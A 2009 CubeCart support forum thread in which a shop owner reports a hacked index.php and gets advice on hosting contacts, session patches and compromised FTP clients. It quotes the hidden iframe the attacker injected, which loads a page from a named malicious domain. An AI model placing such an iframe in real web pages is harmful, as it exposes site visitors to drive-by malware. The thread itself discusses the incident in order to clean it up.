Guest tiptoncp Posted November 9, 2009 Share Posted November 9, 2009 The particular site is still in development on a closed system. Although the admin screen is still accessible for development login purposes. I just realized that the site had been hacked and there was an encoded script injected at the bottom of the index.php file in the main directory. The script is linked to a high risk malicious domain. This is the iframe it injected. I did not decode the script, so I don't know if this is all it was doing or not. <iframe width="635" height="586" style="display: none;" src="http://besenok.org/stds/go.php?sid=1&12694ea4d" name="f884005"/> I saw the update that apparently fixes some vulnerabilities with sessions. When I implemented it, it screwed up all of my user/superuser admin dashboards. The access rights was still correct, as it would prompt saying you did not have access to this page if you were just an admin, but instead of hiding the links like before, it was showing everything. I have looked at the new code for the sessions, but I cannot find anything linked to the visibility of the inaccessible items. Any ideas? Also, is the sessions fix directly related to the attack I mentioned above? Thanks Quote Link to comment Share on other sites More sharing options...
Robsta Posted November 9, 2009 Share Posted November 9, 2009 You need to contact your hosting company as they will be able to trace the hack. It may not have come in via CubeCart, but through someone else on that server. It's important to keep software on servers up-to-date to help prevent this type of thing, if someone else on the server has not upgraded their software the hack may have come in through there. Either way, your hosting company needs to know. Quote Link to comment Share on other sites More sharing options...
Guest tiptoncp Posted November 23, 2009 Share Posted November 23, 2009 Yea, they were notified. But, any idea on why the Session's Fix CC put out around that time would make my permissions get all out of whack? Quote Link to comment Share on other sites More sharing options...
Ausy Posted November 23, 2009 Share Posted November 23, 2009 Yea, they were notified. But, any idea on why the Session's Fix CC put out around that time would make my permissions get all out of whack? Which of the session fixes have you implemented, have you made all the security updates recently released? Quote Link to comment Share on other sites More sharing options...
Guest tiptoncp Posted November 23, 2009 Share Posted November 23, 2009 You brought up a good point that I didn't even think about... Running 4.3.0, implemented this patch http://forums.cubecart.com/index.php?showtopic=39766 Makes my admin panel fully visible regardless of permissions. However, permissions are still intact and prompts a message saying access restricted when clicking on something. So, I guess I need to implement the changes from 4.3.0 to 4.3.5 and then implement this patch. Usually, security patches are stand alone in version number. The site and admin panel are heavily modified. So, I try to only do security updates. If you have any other ideas, let me know. Otherwise, I'll go back and stat implementing the previous patches. Quote Link to comment Share on other sites More sharing options...
Ausy Posted November 23, 2009 Share Posted November 23, 2009 I think if you did the patch you linked to, then no need to do the previous sessions patch, I was just checking that you had done the latest one. Quote Link to comment Share on other sites More sharing options...
Guest tiptoncp Posted November 23, 2009 Share Posted November 23, 2009 Oh, no. I haven't done the latest one. Just saw it today, actually. Well... I'm not sure why 4.3.6 would change everything thing then... but it does. I looked at the code. Maybe I missed it, but I didn't see anything related to visibility of items. Which, I wouldn't expect it to be. So, I'm a bit lost as to why it has an effect on that. Quote Link to comment Share on other sites More sharing options...
Guest asafisk Posted November 30, 2009 Share Posted November 30, 2009 The only time I've seen this before is when someone used compromised FTP software to upload files. The FTP program - I forget the name now inserted an iframe in any 'index.' file that was uploaded. I guess FTP software could become compromised in a number of ways, the two most likely being, 1. the FTP software has been hacked before being installed 2. there is a virus on the pc which has contaminated the FTP software Of course you would need to change the FTP login details as these will most likely have been reported to the iframe host. If you have uploaded files to other sites they should also be checked. I would recommend running good antivirus (my favourite at the moment is Kaspersky) and removing and replacing the FTP software with something clean and secure. I quite like SmartFTP. The iframe can then be removed manually and the file re-uploaded. Quote Link to comment Share on other sites More sharing options...
Guest tiptoncp Posted November 30, 2009 Share Posted November 30, 2009 Hmm, interesting. Thanks for the info. I'll look into to that. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.